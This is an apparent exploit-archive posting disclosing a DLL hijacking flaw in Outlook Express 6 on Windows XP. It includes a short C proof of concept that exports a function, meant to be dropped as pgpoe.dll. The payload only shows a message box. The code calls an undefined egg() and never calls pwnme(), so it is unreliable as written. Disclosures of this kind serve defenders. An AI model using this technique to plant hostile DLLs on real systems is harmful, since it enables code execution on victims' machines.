Outlook 6.0.2900.5508 DLL Hijack
Posted on 04 January 2011
############################################# outlook 6.0.2900.5508 dll hijacking vulnerability software : outlook - http://www.microsoft.com author : d3c0der - d3c0der@hotmail.com website : www.attackerz.ir Operating System: Windows XP (Version 5.1 Service Pack 3) Application: msimn.exe Vulnerable dll : pgpoe.dll date : 212011 about dll : ############################################# #include <windows.h> #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int pwnme() { MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK); exit(0); return 0; } ##############################################